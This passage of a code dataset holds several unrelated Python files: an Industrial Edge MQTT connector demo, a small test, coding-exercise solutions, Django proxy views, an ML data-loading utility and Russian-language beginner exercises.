{pub}\")\n\n#============================\n# Callback functions\n#============================\n\n#as soon as the client connects successfully, it listens if new data is coming in the custom connector\ndef on_connect(client, userdata, flags, rc): \n if rc == 0: # 0 = connection successful \n print(f\"> {APP_NAME} connected successfully\")\n client.connected_flag = True\n \n # Publish Metadata\n publish_metadata(client)\n \n # Publish status data\n publish_statusdata(client)\n \n else:\n print(\"Connection failed!1\")\n return\n\ndef on_disconnect(client, userdata, rc):\n print(f\"{APP_NAME} is disconnected\")\n client.connected_flag = False\n \n print(\"END of LOOP\")\n client.loop_stop() \n\ndef on_message(client, userdata, message):\n print(f\"Recieved message = {message.payload} on topic = {message.topic}\")\n \n # If data is coming in on write topic, write this data on output topic (data read topic)\n if message.topic == MQTT_DATA_WRITE_TOPIC: \n \n # write input data on dedicated topic (data read topic)\n client.publish(MQTT_DATA_READ_TOPIC, message.payload)\n print(\"Data is written\")\n \n # ignore all other topics\n else:\n return\n \n\n#============================\n# Main function\n#============================\n\nprint(\"\\n\\nStarting custom connector application\")\nprint(\"-------------------------------------\")\n\n# Read config file if existing\ntry:\n print(\"\\n\\n1. Read configuration file\")\n params = read_parameter(CONFIG_FILE)\n MQTT_USER = params['MQTT_USER']\n MQTT_PASSWORD = params['MQTT_PASSWORD']\n MQTT_METADATA_TOPIC = params['MQTT_METADATA_TOPIC']\n MQTT_DATA_READ_TOPIC = params['MQTT_DATA_READ_TOPIC']\n MQTT_DATA_WRITE_TOPIC = params['MQTT_DATA_WRITE_TOPIC']\n MQTT_STATUS_TOPIC = params['MQTT_STATUS_TOPIC']\n\n# If no config file exists, configure with default values\nexcept:\n print(\"> Warning: no config file available! 
Using default values...\")\n MQTT_USER = 'edge'\n MQTT_PASSWORD = 'edge'\n MQTT_METADATA_TOPIC = 'ie/m/j/simatic/v1/custom1/dp'\n MQTT_DATA_READ_TOPIC = 'ie/d/j/simatic/v1/custom1/dp/r/connection1/collection1'\n MQTT_DATA_WRITE_TOPIC = 'ie/d/j/simatic/v1/custom1/dp/w/connection1/collection1'\n MQTT_STATUS_TOPIC = 'ie/s/j/simatic/v1/custom1/status'\n\nprint(f\"> MQTT_USER = {MQTT_USER}\")\nprint(f\"> MQTT_PASSWORD = {MQTT_PASSWORD}\")\nprint(f\"> MQTT_METADATA_TOPIC = {MQTT_METADATA_TOPIC}\")\nprint(f\"> MQTT_DATA_READ_TOPIC = {MQTT_DATA_READ_TOPIC}\")\nprint(f\"> MQTT_DATA_WRITE_TOPIC = {MQTT_DATA_WRITE_TOPIC}\")\nprint(f\"> MQTT_STATUS_TOPIC = {MQTT_STATUS_TOPIC}\")\n\n\n# Create metadata fix setting)\n# ----------------------------\nprint(\"\\n\\n2. Create metadata\")\n\n# Metadata JSON (fix definition)\nMETADATA_JSON = {\n \"seq\":1,\n \"hashVersion\":123456789,\n\t\"applicationName\":\"Custom Connector V1.0\",\n\t\"statustopic\":MQTT_STATUS_TOPIC,\n \"connections\":\n [\n {\n \"name\":\"Connection_1\",\n \"type\":\"simulated\",\n \"dataPoints\":\n [\n {\n \"name\":\"Collection_1\",\n \"topic\":MQTT_DATA_READ_TOPIC,\n \"pubTopic\":MQTT_DATA_WRITE_TOPIC,\n \"publishType\":\"bulk\",\n \"dataPointDefinitions\":\n [\n {\n \"name\":\"Datapoint_Bool\",\n \"id\":\"101\",\n \"dataType\":\"Bool\"\n },\n {\n \"name\":\"Datapoint_Int\",\n \"id\":\"102\",\n \"dataType\":\"Int\"\n },\n {\n \"name\":\"Datapoint_Real\",\n \"id\":\"103\",\n \"dataType\":\"Real\"\n }\n ]\n }\n ]\n }\n ]\n}\n\nprint(f\"{METADATA_JSON}\")\n\nmeta_json_string = json.dumps(METADATA_JSON)\nprint(f\"{meta_json_string}\")\n\n# Create status data (fix setting)\n# -------------------------------\nprint(\"\\n\\n3. Create status data\")\n\n# Metadata JSON (fix definition)\nSTATUS_JSON = {\n \"seq\":1,\n \"ts\":str(datetime.datetime.now()),\n \"connector\":{\"status\": \"good\"},\n \"connections\":\n [\n {\"name\": \"Connection_1\", \"status\": \"good\"}\n ]\n}\n \nprint(f\"{STATUS_JSON}\")\n\nstatus_json_string = json.dumps(STATUS_JSON)\nprint(f\"{status_json_string}\")\n\n# Configure MQTT client\n# ---------------------\n\nprint(\"\\n\\n4. Configure MQTT client\")\n\nclient = mqtt.Client(client_id = APP_NAME)\n\n#set username and password, must be created it databus configurator\nclient.username_pw_set(MQTT_USER,MQTT_PASSWORD)\n\n#add callback functions\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.on_message = on_message\n\n# Start client\n# ------------\nprint(\"\\n\\n5. Start MQTT client\")\nclient.connect(MQTT_BROKER)\n\n# subscribe to write data topic and listen, if data is written\nret = client.subscribe(MQTT_DATA_WRITE_TOPIC)\nprint(f\"Subscribed to write topic ({MQTT_DATA_WRITE_TOPIC}) with result = {ret}\")\n\n# MQTT loop\n# ---------\n\n# starts a loop in another thread and lets the main thread continue to do other things\n# loop_stop() is places in function \"on_disconnect\"\nclient.loop_start()\n\n# MAIN thread\n# -----------\nprint(\"Publish metadata and status every 5 seconds\")\n \nwhile True:\n \n # Publish Metadata\n publish_metadata(client)\n \n # Publish Status Data\n publish_statusdata(client)\n \n # Wait for 5 seconds\n time.sleep(5)\n","repo_name":"industrial-edge/common-databus-payload-format","sub_path":"src/custom_connector.py","file_name":"custom_connector.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"17053232666","text":"import hashlib\n\nimport pytest\n\nfrom api import eval_card\n\ncases = [\n ('x + y', b'\\x8c{d\\xb7\\xfb\\xe3\\xd7\\xf76J\\xcc\\xf2`\\xe7W\\x1c'),\n]\n\n\n@pytest.mark.parametrize('func, expected', cases)\ndef test_card(func: str, expected: bytes):\n actual = eval_card('plot_3d', func, None, None)['svg']\n assert hashlib.md5(actual.encode()).digest() == expected\n","repo_name":"eagleoflqj/sympy_beta","sub_path":"kernel/test/test_plot/test_plot_3d.py","file_name":"test_plot_3d.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"70"}
+{"seq_id":"26398370598","text":"if __name__ == '__main__':\n l2 = []\n for _ in range(int(input())):\n l1 = []\n name = input()\n l1.append(name)\n score = float(input())\n l1.append(score)\n l2.append(l1)\n#print(l2)\nl3 = []\nfor i in range(len(l2)):\n l3.append(l2[i][1])\ns = sorted(set(l3))\nn = min(s)\ns.remove(n)\nfor num in s:\n if num == n:\n s.remove(num)\ns.sort()\nl4 = []\nfor item in l2:\n if item[1]== s[0]:\n l4.append(item[0])\n# l4.sort()\nprint(*sorted(l4), sep=\"\\n\")\n#print(*sorted(names_of_second_lowest), sep=\"\\n\")","repo_name":"MuhammadAli7896/All-Python-projects","sub_path":"HackerRank/Nested_Lists.py","file_name":"Nested_Lists.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2369413056","text":"\"\"\"\nProblem:\n\n10.1 Sorted Merge: You are given two sorted arrays, A and B, where A has a large enough buffer at the\nend to hold B. Write a method to merge B into A in sorted order.\n\nHints: #332\n\n--\n\nQuestions:\n\n- Can I assume both arrays always have elements in them?\n\n--\n\nAlgorithm:\n\nA = [1,4,5,7,8,-,-,-,-]\nB = [0,3,4,6]\n\nResult = [0,1,3,4,4,5,6,7,8]\n\n\n-- Using additional memory --\n\nWe want to compare each element of A and B and take the smallest one first.\nAdd it to a new array of the same size of A.\nAt the end, copy the elements back to A.\n\nBeing n the number of elements in array A and m the size of array B:\nTime Complexity: O(n + m)\nSpace Complexity: O(n + m)\n\n-- In-place --\n\nShift all elements of A to the end of the array.\n\n i j\nShifted A = [-,-,-,-,1,4,5,7,8]\n k\nB = [0,3,4,6]\n\nHave two pointers at the beginning of A and one at the first valid element.\nCompare B and A elements, storing them in the beginning of A.\n\nTime Complexity: O(n + m)\nSpace Complexity: O(1)\n\nAlthough, being O(n+m) in time complexity, this algorithm has to shift all\nelements of A to the right. So, it is Theta(2n + m). Can we make it better?\n\n-- Optimizing it --\n\nWe could move the pointers to the last elements of each array and\ncompare them, moving the largest number to the end of the array.\n\nThis saves the time of shifting all elements of A to the right.\n\nPS: The book's solution assumes we are given the positions of the last element in A and B.\nSo, it does not have to iterate over the array to count the elements.\nIf we do not know these positions, we still have to go through all the elements\nof A to know where to position our pointers.\n\n\"\"\"\n\n\ndef sorted_merge(arr1, arr2):\n n_elements = count_elements(arr1)\n shift_elements_right(arr1, n_elements)\n\n i = 0\n j = len(arr1) - n_elements\n k = 0\n\n while k < len(arr2) and j < len(arr1):\n if arr2[k] < arr1[j]:\n arr1[i] = arr2[k]\n k += 1\n else:\n arr1[i] = arr1[j]\n j += 1\n i += 1\n\n while k < len(arr2):\n arr1[i] = arr2[k]\n i += 1\n k += 1\n\n return arr1\n\n\ndef count_elements(arr):\n count = 0\n\n for i in range(len(arr)):\n if arr[i] is not None:\n count += 1\n\n return count\n\n\ndef shift_elements_right(arr, n_elements):\n n = len(arr)\n\n for i in range(n_elements):\n arr[n - 1 - i], arr[n_elements - 1 - i] = (\n arr[n_elements - 1 - i],\n arr[n - 1 - i],\n )\n\n\ndef test(arr1, arr2, expected_answer):\n answer = sorted_merge(arr1, arr2)\n\n if answer != expected_answer:\n raise Exception(\n f\"Answer {answer} is wrong. Expected answer is {expected_answer}\"\n )\n\n\nif __name__ == \"__main__\":\n test(\n [1, None],\n [0],\n [0, 1],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [0, 3, 4, 6],\n [0, 1, 3, 4, 4, 5, 6, 7, 8],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [0, 0, 0, 0],\n [0, 0, 0, 0, 1, 4, 5, 7, 8],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [9, 9, 10, 10],\n [1, 4, 5, 7, 8, 9, 9, 10, 10],\n )\n print(\"All tests passed!\")\n","repo_name":"andrenbrandao/cracking-the-coding-interview","sub_path":"10-sorting-and-searching/1-sorted-merge/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"29915349381","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom main.helpers import ajax_login_required\n# Create your views here.\nfrom django.views import View\nfrom django.views import generic\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nimport requests\nimport logging\nimport json\n\nlogger = logging.getLogger(__name__)\n\n\nclass Prj_api_index(generic.TemplateView):\n def get(self, request, *args, **kwargs):\n template_name = 'prj/index.html'\n\n r = requests.get('http://prj_api:5002/hello')\n rr = {\n \"result\": r.text\n }\n\n return render(request, template_name, rr)\n\n\n# 프로젝트 목록 조회 화면 호출\ndef prjListSrch(request):\n template_name = 'prj/prjListSrch.html'\n\n return render(request, template_name)\n\n# 개발자 등록 화면\ndef devReg(request):\n template_name = 'prj/devReg.html'\n\n return render(request, template_name)\n\n\n@login_required\ndef retrieve(request):\n headers = {'Content-Type': 'application/json; charset=utf-8'}\n params = {} # get 일때 사용\n data = {\n 'username': 'bulee',\n 'email': 'bulee@infogen.co.kr'\n }\n\n # requests.get(url, params=params)\n res = requests.post('http://prj_api:5002/retrieve', headers=headers,\n json=data) # data가 다층 구조일 땐 json.dumps(data) 사용\n\n if res.status_code == requests.codes.ok:\n retVal = res.json()\n retVal['status'] = 'ok'\n else:\n retVal = {\n 'status': 'fail'\n }\n logger.debug(retVal);\n return JsonResponse(retVal)\n\n\ndef prjReg(request):\n template_name = 'prj/prjReg.html'\n\n return render(request, template_name)\n\n\n# 프로젝트 정보 조회\ndef retrievePrjInfo(request):\n param = json.loads(request.GET['param'])\n\n params = {\n 'prj_cd': param['prj_cd'],\n }\n\n r = requests.get('http://prj_api:5002/retrievePrjInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 요구 스킬 조회\ndef retrieveReqSkil(request):\n param = json.loads(request.GET['param'])\n\n params = {\n 'prj_cd': param['prj_cd'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveReqSkil', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 등록 스킬명 조회\ndef retrieveSkilName(request):\n param = json.loads(request.GET['param'])\n\n params = {\n\n }\n\n r = requests.get('http://prj_api:5002/retrieveSkilName', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 저장\n@ajax_login_required\ndef prjSave(request):\n userId = str(request.user)\n param = json.loads(request.POST['param'])\n\n datas = {\n 'userId': userId\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/prjSave', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 삭제\n@ajax_login_required\ndef prjDelete(request):\n param = json.loads(request.POST['param'])\n\n datas = {\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/prjDelete', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json())\n\n\n# 프로젝트별투입현황관리 프로젝트 상세정보\ndef retrievePrjDetlInfo(request):\n param = json.loads(request.GET['param'])\n logger.info(param)\n logger.info(\"프로젝트별투입현황관리 프로젝트 상세정보\")\n params = {\n 'prjCd': param['prjCd']\n }\n r = 
requests.get('http://prj_api:5002/retrievePrjDetlInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 화면\ndef prjInpuMgmt(request):\n template_name = 'prj/prjInpuMgmt.html'\n\n return render(request, template_name)\n\n\n# 프로젝트별투입현황관리 조회\ndef prjInpuSearch(request):\n param = json.loads(request.GET['param'])\n logger.info(\"prjInpuSearch : skil/views.py\")\n datas = {\n 'prjCd': param['prjCd']\n }\n r = requests.get('http://prj_api:5002/prjInpuSearch', params=datas)\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 삭제\ndef prjInpuDelete(request):\n param = json.loads(request.POST['param'])\n logger.info(param)\n logger.info(\"prjInpuDelete : skil/views.py\")\n datas = {\n 'prjCd': param['PRJ_CD'],\n 'empNo': param['EMP_NO'],\n }\n\n logger.info('request.post : ' + request.POST['param'])\n\n r = requests.post('http://prj_api:5002/prjInpuDelete', data=datas)\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 저장\ndef prjInpuSave(request):\n param = json.loads(request.POST['param'])\n userId = str(request.user)\n logger.info(param)\n for data in param:\n if '__created__' in data and data['__created__']:\n logger.info(\"__created__\")\n datas = {\n 'empNo': data['EMP_NO'],\n 'prjCd': data['PRJ_CD'],\n 'slinGrd': data['SLIN_GRD'],\n 'inpuStrtDay': data['INPU_STRT_DAY'],\n 'inpuEndDay': data['INPU_END_DAY'],\n 'cntcStrtDay': data['CNTC_STRT_DAY'],\n 'cntcEndDay': data['CNTC_END_DAY'],\n 'crgeJob': data['CRGE_JOB'],\n 'rmks': data['RMKS'],\n 'state': 'created',\n 'userId' : userId\n }\n else:\n logger.info(\"modified\")\n datas = {\n 'empNo': data['EMP_NO'],\n 'prjCd': data['PRJ_CD'],\n 'slinGrd': data['SLIN_GRD'],\n 'inpuStrtDay': data['INPU_STRT_DAY'],\n 'inpuEndDay': data['INPU_END_DAY'],\n 'cntcStrtDay': data['CNTC_STRT_DAY'],\n 'cntcEndDay': data['CNTC_END_DAY'],\n 'crgeJob': data['CRGE_JOB'],\n 'rmks': data['RMKS'],\n 'state': 'modified',\n 'userId': userId\n }\n r = requests.post('http://prj_api:5002/prjInpuSave', data=datas)\n return JsonResponse(r.json())\n\n\n# 프로젝트 목록 조회\ndef prjListSearch(request):\n logger.info(\"prjListSearch : prj/views.py\")\n param = json.loads(request.GET['param'])\n logger.info(param)\n\n datas = {\n 'deptDiv': param['deptDiv'],\n 'skilDiv': param['skilDiv']\n }\n\n logger.info(datas)\n r = requests.get('http://prj_api:5002/prjListSearch', params=datas)\n\n paginator = Paginator(r.json(), 10)\n logger.info(\"----------------\")\n logger.info(paginator)\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n\n result = paginator.get_page(param['page'])\n\n logger.info(result)\n\n data = {\n 'list': list(result.object_list),\n 'total_records': paginator.count,\n 'total_pages': paginator.num_pages,\n 'page': result.number,\n 'has_next': result.has_next(),\n 'has_prev': result.has_previous()\n }\n\n # return JsonResponse(r.json())\n return JsonResponse(data)\n\n#부서 코드 조회\ndef getDeptCd(request):\n param = json.loads(request.GET['param'])\n logger.info('===============================')\n logger.info(param)\n logger.info('===============================')\n datas = {}\n\n r = requests.get('http://prj_api:5002/getDeptCd', params=datas)\n\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n logger.info(r.json())\n logger.info(json.loads(r.text))\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 조회\ndef retrieveDevInfo(request):\n param = json.loads(request.GET['param'])\n logger.info(param)\n\n 
params = {\n 'emp_no': param['emp_no'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveDevInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 저장\ndef devSave(request):\n userId = str(request.user)\n param = json.loads(request.POST['param'])\n\n datas = {\n 'userId': userId\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n logger.info(datas)\n r = requests.post('http://prj_api:5002/devSave', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 삭제\ndef devDelete(request):\n param = json.loads(request.POST['param'])\n\n datas = {\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/devDelete', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json())\n\n#공통 코드 조회\ndef retrieveCmmCd(request):\n param = json.loads(request.GET['param'])\n logger.info('param')\n logger.info(param)\n\n params = {\n 'grp_id': param['grp_id'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveCmmCd', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 조회\ndef devMgmt(request):\n template_name = 'prj/devMgmt.html'\n\n return render(request, template_name)\n\ndef devMgmtSearch(request):\n\n param = json.loads(request.GET['param'])\n logger.info(\"devMgmtSearch : prj/views.py\")\n datas = {\n 'devpBlco': param['devpBlco'],\n 'empName': param['empName'],\n 'devpDivsCd': param['devpDivsCd']\n }\n\n logger.info(datas)\n r = requests.get('http://prj_api:5002/devMgmtSearch', params=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n logger.info(r.json())\n logger.info(json.loads(r.text))\n # return JsonResponse(r.json())\n return JsonResponse(r.json(), safe=False)","repo_name":"smilebulee/infogen_ims","sub_path":"ifg_front/prj_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"17201290341","text":"import cv2\nimport os\nimport numpy as np\nimport pathlib\nfrom itertools import chain\nfrom sklearn.model_selection import train_test_split\n\n#text\nimport re\nfrom nltk import word_tokenize\nimport gensim\nimport embedding_utils\n\nimage_label_list = [] #list of category names to avoid confusion\ntext_label_list = [] #list of category names to avoid confusion\nspectogram_label_list = []\n\ndef get_spectogram_data(image_size=224):\n number_of_image_parts = 10\n spectogram_path = './data/spectrogram'\n total_image_file = 0\n\n for root, dirs, files in os.walk(spectogram_path):\n for file in files:\n total_image_file+=1\n one_image = cv2.imread(root + '/' + file)\n img_height, img_width = one_image.shape[:2]\n\n target_list = []\n #x is a np array with shape (height, height, 3), because the aspect ratio is kept the same\n x = np.zeros(shape=(total_image_file*number_of_image_parts, \\\n image_size, image_size, 3), dtype=np.uint8)\n\n category = os.listdir(spectogram_path)\n for i, cat in enumerate(category):\n spec_name_list = os.listdir(spectogram_path + '/{}'.format(cat))\n spectogram_label_list.append(cat)\n for spectogram_name in spec_name_list:\n spectogram_full_path = '%s/%s/%s' %(spectogram_path, cat, spectogram_name)\n\n image = cv2.imread(spectogram_full_path)\n for j in range(number_of_image_parts):\n hm_width = img_width//10 #how much pixel width per part\n start_pixel = j*hm_width\n end_pixel = (j+1)*hm_width\n #crop = im[y1:y2, x1:x2]\n #(x1, y1) = top, left; (x2, y2) = bottom right\n cropped_image = image[:, start_pixel:end_pixel]\n\n resized_image = cv2.resize(cropped_image, (image_size, image_size))\n x[i] = resized_image\n\n #create the categorical target list\n #e.g. Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n y = np.zeros((len(target_list), len(spectogram_label_list)), dtype=np.int32)\n #===turn categorical target into one hot===\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n\ndef get_image_data(image_size=224):\n #todo: instead of appending the data into lists, just create np zeros and fill it.\n image_path = './data/images'\n total_image_file = 0\n count = 0\n\n #count the total image file in the /data/image folder\n for root, dirs, files in os.walk(image_path):\n for file in files:\n total_image_file+=1\n\n x = np.zeros((total_image_file, image_size, image_size, 3), dtype=np.uint8)\n target_list = []\n\n #===reading images into image_list array===\n category = os.listdir(image_path)\n for i, cat in enumerate(category):\n img_list = os.listdir(image_path + '/{}'.format(cat))\n image_label_list.append(cat)\n for image_name in img_list:\n #insert the image into np array\n x[count, :] = cv2.resize(cv2.imread('%s/%s/%s' %(image_path, cat, image_name)),\\\n (image_size, image_size))\n count+=1\n\n #create the categorical target list\n #e.g. 
Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n #===create one hot vector===\n y = np.zeros((total_image_file, len(image_label_list)), dtype=np.int32)\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n\ndef get_text_data():\n max_sequence_length = 10 #maximum sequence length of RNN\n dim_size = 100 #dimension of embedding\n\n text_path = './data/text'\n\n sentence_list = []\n target_list = []\n\n #===read text into text_list array===\n category = os.listdir(text_path)\n for i, cat in enumerate(category):\n txt_list = os.listdir(text_path + '/{}'.format(cat))\n text_label_list.append(cat)\n for text_name in txt_list:\n text_full_dir = '%s/%s/%s' %(text_path, cat, text_name)\n with open(text_full_dir, 'r') as f:\n #preprocess: splitting the text into list, separated by \\n\n texts = f.readlines()\n for text in texts:\n sentence = re.sub('\\n', '', text)\n tokens = word_tokenize(sentence)\n\n #append the sentence into a list\n sentence_list.append(tokens)\n\n #create the categorical target list\n #e.g. Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n #===get embedding model===\n #instantiate the class\n embedding = embedding_utils.Embedding(sentence_list)\n model = embedding.get_embedding_model()\n\n #===representing words with word vectors===\n x = np.zeros((len(sentence_list), max_sequence_length, dim_size))\n y = np.zeros((len(sentence_list), len(text_label_list)), dtype=np.int32)\n\n \"\"\"\n fill the vectors into the np array, if the sentence is longer than the maximum\n sequence length, index error will be raised, and ignored (pass). If the sentence is more\n than max seq length, then only the first len(max seq len) words are turned into vectors\n \"\"\"\n for index, sentence in enumerate(sentence_list):\n try:\n for token_index, token in enumerate(sentence):\n x[index, token_index, :] = model[token]\n except:\n pass\n\n #===turn categorical target into one hot===\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n","repo_name":"vinliao/culture-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
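get_spectogram_data, get_image_data and get_text_data all end with the same two-stage 70/15/15 split; a standalone sketch of that idiom with toy arrays:

import numpy as np
from sklearn.model_selection import train_test_split

x = np.arange(100).reshape(100, 1)  # toy features
y = np.arange(100)                  # toy labels
# First carve off 30%, then split that 30% in half: 70/15/15 overall.
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)
x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)
print(len(x_train), len(x_valid), len(x_test))  # 70 15 15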
+{"seq_id":"21218369562","text":"#1\r\ndef message(i):\r\n print(f\"Привет {i}\\n\")\r\nname=input(\"Введите имя: \")\r\nmessage(name)\r\n\r\n#2\r\ndef func(t, r):\r\n return t\r\nitem = input(\"Введите текст: \")\r\nn = int(input(\"Количество текста: \"))\r\na = func(item, n)\r\nfor i in range (n):\r\n print(a)\r\nprint(\"\\n\")\r\n\r\n#3\r\ndef func(num1,num2):\r\n if num1 > num2:\r\n z = f\"{num1} > {num2}\"\r\n elif num2 > num1:\r\n z = f\"{num2} > {num1}\"\r\n else:\r\n z = \"equal\"\r\n return z\r\nnum1 = int(input(\"Первое число: \"))\r\nnum2 = int(input(\"Второе число: \"))\r\ny = func(num1,num2)\r\nprint(y)\r\nprint(\"\\n\")\r\n\r\n#4\r\ndef func(num1,num2,num3):\r\n z = max(num1,num2,num3)\r\n return z\r\nnum1 = int(input(\"Первое число: \"))\r\nnum2 = int(input(\"Второе число: \"))\r\nnum3 = int(input(\"Третье число: \"))\r\ny = func(num1,num2,num3)\r\nprint(f\"Наибольшое число {y}\\n\")\r\n\r\n\r\n#5\r\ndef func(num1,num2,num3):\r\n if num1 + num2 > num3 and num1 + num3 > num2 and num2 + num3 > num1:\r\n z = \"Треугольник существует\\n\"\r\n else:\r\n z = \"Треугольник не существует!\\n\"\r\n return z\r\nnum1 = int(input(\"Первая сторона: \"))\r\nnum2 = int(input(\"Вторая сторона: \"))\r\nnum3 = int(input(\"Третья сторона: \"))\r\ny = func(num1,num2,num3)\r\nprint(y)\r\n\r\n#6\r\ndef func(word1,word2):\r\n z = word1 + \"\" + word2\r\n return z\r\nword1 = input(\"Первое слово: \")\r\nword2 = input(\"Второе слово: \")\r\ny = func(word1,word2)\r\nprint(f\"{y}\\n\")\r\n\r\n#7\r\ndef func(op1,op2,op3,x,i=1):\r\n if op3 == \"+\": \r\n x = op1 + op2\r\n elif op3 == \"-\": \r\n x = op1 - op2\r\n elif op3 == \"*\": \r\n x = op1 * op2\r\n elif op3 == \"/\": \r\n x = op1 / op2\r\n else:\r\n x = \"Unknown operation\"\r\n return x\r\n return f\"{x:.{i}f}\"\r\nop1 = int(input(\"Первое число: \"))\r\nop2 = int(input(\"Второе число: \"))\r\nop3 = (input(\"Операция (+, -, *, /): \"))\r\nx = 0\r\ny = func(op1,op2,op3,x,2)\r\nprint(f\"{y}\\n\")\r\n\r\n#8\r\ndef func(tag,text):\r\n z = f\"<{tag}>{text}<{tag}>\\n\"\r\n return z\r\ntag = input(\"Тэг: \")\r\ntext = input(\"Текст: \")\r\ny = func(tag,text)\r\nprint(y)\r\n\r\n#9\r\ndef func(x):\r\n if x<=2 or x==12:\r\n m = \"Winter\\n\"\r\n elif x>2 and x <=5:\r\n m = \"Spring\\n\"\r\n elif x>5 and x <=8:\r\n m = \"Summer\\n\"\r\n elif x>8 and x <=11:\r\n m = \"Autumn\\n\"\r\n else:\r\n m = \"Месяц не найден\\n\"\r\n return m\r\nx = int(input(\"Номер месяца: \"))\r\ny = func(x)\r\nprint(y)\r\n\r\n#10\r\ndef func(n):\r\n for i in n:\r\n print(\"*\" * i)\r\nfunc([2,7,1,4,2,3,9,3] )\r\nprint(\"\\n\")\r\n\r\n#11\r\ndef num(a):\r\n if a % 2 == 0:\r\n print(\"Число парное\\n\")\r\n else:\r\n print(\"Число непарное\\n\")\r\na = int(input(\"Введите число: \"))\r\nnum(a)\r\n\r\n#12\r\ndef func(numbers):\r\n x = [numbers[0], numbers[-1]]\r\n print(x)\r\nnumbers = [5, 16, 72, 29, 11, 217, 112]\r\nfunc(numbers)\r\nprint(\"\\n\")\r\n\r\n#13\r\ndef fact(x, i = a, z = a) :\r\n while i <= x:\r\n i *= z\r\n z += a\r\n print(i)\r\nx = int(input(\"Введите факториал: \"))\r\nfact(x)\r\nprint(\"\\n\")\r\n\r\n#14\r\nimport math\r\ndef triangle(side1, side2, side3):\r\n p = (side1 + side2 + side3)/2\r\n print(math.sqrt(p*(p-side1)*(p-side2)*(p-side3)))\r\n \r\ndef check_triangle(side1, side2, side3):\r\n if side1 + side2 > side3 and side1 + side3 > side2 and side2 + side3 > side1:\r\n return True\r\n 